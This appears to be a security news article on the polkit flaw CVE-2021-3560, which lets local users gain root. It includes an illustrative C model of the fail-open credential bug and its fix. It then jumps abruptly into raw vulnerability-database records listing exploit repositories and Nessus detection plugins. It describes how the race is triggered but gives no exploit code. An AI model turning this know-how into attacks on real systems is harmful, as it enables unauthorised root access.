A seven-year-old privilege escalation vulnerability discovered in the polkit system service could be exploited by a malicious unprivileged local attacker to bypass authorization and escalate permissions to the root user.
Tracked as [CVE-2021-3560](<https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/>) (CVSS score: 7.8), the flaw affects polkit versions between 0.113 and 0.118 and was discovered by GitHub security researcher Kevin Backhouse, who said the issue was [introduced in a code commit](<https://gitlab.freedesktop.org/polkit/polkit/-/commit/bfa5036bfb93582c5a87c44b847957479d911e38>) made on Nov. 9, 2013. Red Hat's Cedric Buissart [noted](<https://seclists.org/oss-sec/2021/q2/180>) that Debian-based distributions, based on polkit 0.105, are also vulnerable.
[Polkit](<https://en.wikipedia.org/wiki/Polkit>) (née PolicyKit) is a toolkit for defining and handling authorizations in Linux distributions, and is used for allowing unprivileged processes to communicate with privileged processes.
"When a requesting process disconnects from dbus-daemon just before the call to polkit_system_bus_name_get_creds_sync starts, the process cannot get a unique uid and pid of the process and it cannot verify the privileges of the requesting process," Red Hat [said](<https://access.redhat.com/security/cve/CVE-2021-3560>) in an advisory. "The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability."
RHEL 8, Fedora 21 (or later), Debian "Bullseye," and Ubuntu 20.04 are some of the popular Linux distributions impacted by the polkit vulnerability. The issue has been mitigated in [version 0.119](<https://www.freedesktop.org/software/polkit/releases/>), which was released on June 3.
"The vulnerability is surprisingly easy to exploit. All it takes is a few commands in the terminal using only standard tools like [bash](<https://linux.die.net/man/1/bash>), [kill](<https://linux.die.net/man/2/kill>), and [dbus-send](<https://linux.die.net/man/1/dbus-send>)," said Backhouse in a write-up published yesterday, adding that the flaw is triggered by sending a dbus-send command (say, to create a new user) but terminating the process while polkit is still in the middle of processing the request.
"dbus-send" is a command-line tool that sends a message to the [D-Bus](<https://en.wikipedia.org/wiki/D-Bus>) message bus, a Linux inter-process communication (IPC) mechanism that allows communication between multiple processes running concurrently on the same machine. Polkit's policy authority daemon is [implemented](<https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>) as a service connected to the system bus to authenticate credentials securely.
Killing the command causes an authentication bypass because polkit mishandles the terminated message and treats the request as though it came from a process with root privileges ([UID 0](<https://en.wikipedia.org/wiki/User_identifier>)), thereby immediately authorizing the request.
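The failure mode described above, as a simplified C model added here for illustration (it is not polkit's source code, and every name in it is hypothetical): a credential lookup that swallows the "caller has disconnected" error leaves the UID at its zero initial value, which the authorization check then reads as root. The hardened variant propagates the error and fails closed.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define UID_UNSET UINT_MAX   /* sentinel that is not a valid UID in this model */

/* Constructed stand-in for the message bus: connection name -> owner UID. */
struct bus_peer { const char *name; unsigned uid; bool connected; };

static const struct bus_peer peers[] = {
    { ":1.10", 0,    true  },   /* root-owned client */
    { ":1.42", 1000, true  },   /* unprivileged client, still connected */
    { ":1.43", 1000, false },   /* unprivileged client that already disconnected */
};

/* Ask the bus who owns `name`. Fails, leaving *uid untouched, once the owner is gone. */
static bool bus_get_uid(const char *name, unsigned *uid)
{
    for (size_t i = 0; i < sizeof peers / sizeof peers[0]; i++) {
        if (peers[i].connected && strcmp(peers[i].name, name) == 0) {
            *uid = peers[i].uid;
            return true;
        }
    }
    return false;
}

/* Vulnerable pattern: the lookup error is dropped and success is reported anyway. */
static bool get_creds_unsafe(const char *name, unsigned *out_uid)
{
    unsigned uid = 0;                 /* zero-initialised, and 0 is also root's UID */
    (void)bus_get_uid(name, &uid);    /* failure ignored */
    *out_uid = uid;
    return true;
}

/* Hardened pattern: start from an invalid sentinel and propagate the failure. */
static bool get_creds_safe(const char *name, unsigned *out_uid)
{
    unsigned uid = UID_UNSET;
    if (!bus_get_uid(name, &uid) || uid == UID_UNSET)
        return false;
    *out_uid = uid;
    return true;
}

typedef bool (*creds_fn)(const char *name, unsigned *out_uid);

enum decision { DENY, CHALLENGE, ALLOW };

/* Root callers are authorised immediately; everyone else must authenticate.
 * If the caller's identity cannot be established, the request is denied. */
static enum decision authorize(creds_fn get_creds, const char *caller)
{
    unsigned uid = UID_UNSET;
    if (!get_creds(caller, &uid))
        return DENY;
    return uid == 0 ? ALLOW : CHALLENGE;
}

int main(void)
{
    static const char *names[] = { ":1.10", ":1.42", ":1.43" };
    static const char *label[] = { "DENY", "CHALLENGE", "ALLOW" };

    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-6s unsafe=%-9s safe=%s\n", names[i],
               label[authorize(get_creds_unsafe, names[i])],
               label[authorize(get_creds_safe, names[i])]);
    return 0;
}
```

The disconnected caller `:1.43` is the only row where the two variants disagree, which is the property a regression test for this class of bug should pin down.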
"To trigger the vulnerable codepath, you have to disconnect at just the right moment," Backhouse said. "And because there are multiple processes involved, the timing of that 'right moment' varies from one run to the next. That's why it usually takes a few tries for the exploit to succeed. I'd guess it's also the reason why the bug wasn't previously discovered."
Users are encouraged to update their Linux installations as soon as possible to remediate any potential risk arising out of the flaw.
Source: The Hacker News, "7-Year-Old Polkit Flaw Lets Unprivileged Linux Users Gain Root Access," published 2021-06-11 ([original article](<https://thehackernews.com/2021/06/7-year-old-polkit-flaw-lets.html>)).
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T07:37:15", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-26T07:06:22", "id": "8355CDEF-4353-5AEE-915E-3AF0E2AF9409", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:39", "description": "# CVE-2021-3560\n\n## Polkit - Local Privilege Escalation\n\nOrigina...", "cvss3": {}, "published": "2021-07-26T07:08:36", "type": "githubexploit", "title": "Exploit for CVE-2021-3560", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-11-12T10:15:46", "id": "FC96322B-C3D8-5037-9C04-217A27794418", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-03-15T04:32:09", "description": "# Polkit-CVE-2021-3560\n\n\n## Background\n\nIn early 2021 a research...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-06-29T20:47:16", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-03-15T01:43:44", "id": "72D36AF5-1D4B-53BF-8A5F-28BFD556A52E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-16T21:17:27", "description": "# Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalatio...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T23:56:31", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-09-16T18:47:00", "id": "A7D8D274-4FE7-5BFB-B3A3-7EDB427ED94E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:09:39", "description": "# A NYCU CVE-2021-3560 research. QQ\nA CVE-2021-3560 poc, easy to...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-28T06:05:46", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-29T08:24:46", "id": "6E1579B5-B91F-5348-A0B2-8218964434CA", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:13:22", "description": "# polkit-auto-exploit\nAutomatic Explotation PoC for Polkit CVE-2...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T12:33:56", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-01-26T02:05:53", "id": "B9510646-2BAA-56FD-ABAC-FEAE65C9F78D", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-04T20:32:58", "description": "<h1 align=center>Vivald0x6f</h1>\n<p align=center>Vivald0x6f is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-21T21:39:29", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": 
'content/eus/rhel8/8.1/s390x/supplementary/debug',\n 'content/eus/rhel8/8.1/s390x/supplementary/os',\n 'content/eus/rhel8/8.1/s390x/supplementary/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/appstream/debug',\n 'content/eus/rhel8/8.1/x86_64/appstream/os',\n 'content/eus/rhel8/8.1/x86_64/appstream/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/baseos/debug',\n 'content/eus/rhel8/8.1/x86_64/baseos/os',\n 'content/eus/rhel8/8.1/x86_64/baseos/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/debug',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/os',\n 'content/eus/rhel8/8.1/x86_64/codeready-builder/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/highavailability/debug',\n 'content/eus/rhel8/8.1/x86_64/highavailability/os',\n 'content/eus/rhel8/8.1/x86_64/highavailability/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/debug',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/os',\n 'content/eus/rhel8/8.1/x86_64/resilientstorage/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/debug',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/os',\n 'content/eus/rhel8/8.1/x86_64/sap-solutions/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/sap/debug',\n 'content/eus/rhel8/8.1/x86_64/sap/os',\n 'content/eus/rhel8/8.1/x86_64/sap/source/SRPMS',\n 'content/eus/rhel8/8.1/x86_64/supplementary/debug',\n 'content/eus/rhel8/8.1/x86_64/supplementary/os',\n 'content/eus/rhel8/8.1/x86_64/supplementary/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'polkit-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-9.el8_1.1', 'sp':'1', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == 
RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = subscription_caveat + rpm_report_get() + 
redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:53:24", "description": "The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the CESA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-09T00:00:00", "type": "nessus", "title": "CentOS 8 : polkit (CESA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "cpe:/o:centos:centos:8-stream", "p-cpe:/a:centos:centos:polkit", "p-cpe:/a:centos:centos:polkit-devel", "p-cpe:/a:centos:centos:polkit-docs", "p-cpe:/a:centos:centos:polkit-libs"], "id": "CENTOS8_RHSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150384", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2021:2238. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150384);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RHSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"CentOS 8 : polkit (CESA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nCESA-2021:2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2238\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8-stream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:polkit-libs\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = 
package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:42", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Polkit PHSA-2021-1.0-0397", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2021-1_0-0397_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150284", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-1.0-0397. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150284);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 1.0: Polkit PHSA-2021-1.0-0397\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-397.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
